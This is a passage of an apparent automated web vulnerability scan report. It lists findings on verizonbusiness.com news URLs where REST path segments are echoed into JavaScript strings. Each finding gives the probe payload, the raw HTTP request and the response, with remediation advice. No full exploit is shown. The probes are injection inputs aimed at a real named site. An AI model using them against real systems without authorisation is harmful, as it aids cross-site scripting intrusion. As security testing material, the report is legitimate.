Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40836
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about445b6";57d84659d54/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT C
...[SNIP]...

1.425. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f936a'%3b4102301e0de was submitted in the REST URL parameter 2. This input was echoed as f936a';4102301e0de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsf936a'%3b4102301e0de/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:44 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about/newsf936a';4102301e0de/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
v
...[SNIP]...

1.426. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e157e"%3b8ca0a1c9999 was submitted in the REST URL parameter 2. This input was echoed as e157e";8ca0a1c9999 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newse157e"%3b8ca0a1c9999/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47297
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newse157e";8ca0a1c9999/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGO
...[SNIP]...

1.427. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7d47'%3bc44e3a137ac was submitted in the REST URL parameter 3. This input was echoed as f7d47';c44e3a137ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/f7d47'%3bc44e3a137ac HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:27 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/f7d47';c44e3a137ac'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.428. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec193"%3bf3a2df38088 was submitted in the REST URL parameter 3. This input was echoed as ec193";f3a2df38088 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/ec193"%3bf3a2df38088 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:02 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/ec193";f3a2df38088";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.429. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707be'%3bea9ddb36751 was submitted in the REST URL parameter 1. This input was echoed as 707be';ea9ddb36751 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about707be'%3bea9ddb36751/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:48:53 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40818
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about707be';ea9ddb36751/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i
...[SNIP]...

1.430. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69ba8"%3bb3035579d66 was submitted in the REST URL parameter 1. This input was echoed as 69ba8";b3035579d66 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about69ba8"%3bb3035579d66/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40818
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about69ba8";b3035579d66/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY


...[SNIP]...

1.431. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2ce3"%3b4996ee8df0d was submitted in the REST URL parameter 2. This input was echoed as e2ce3";4996ee8df0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newse2ce3"%3b4996ee8df0d/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47279
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newse2ce3";4996ee8df0d/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPT
...[SNIP]...

1.432. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd0fb'%3b02135e5dcf9 was submitted in the REST URL parameter 2. This input was echoed as cd0fb';02135e5dcf9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newscd0fb'%3b02135e5dcf9/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47279
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/newscd0fb';02135e5dcf9/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; i
...[SNIP]...

1.433. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0252"%3b851574e3ffe was submitted in the REST URL parameter 3. This input was echoed as f0252";851574e3ffe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/f0252"%3b851574e3ffe HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/f0252";851574e3ffe";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.434. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc95'%3b2cd07d6e394 was submitted in the REST URL parameter 3. This input was echoed as 4bc95';2cd07d6e394 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/4bc95'%3b2cd07d6e394 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:34 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/4bc95';2cd07d6e394'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.435. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a875d'%3b99415106e64 was submitted in the REST URL parameter 1. This input was echoed as a875d';99415106e64 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /abouta875d'%3b99415106e64/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40922
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
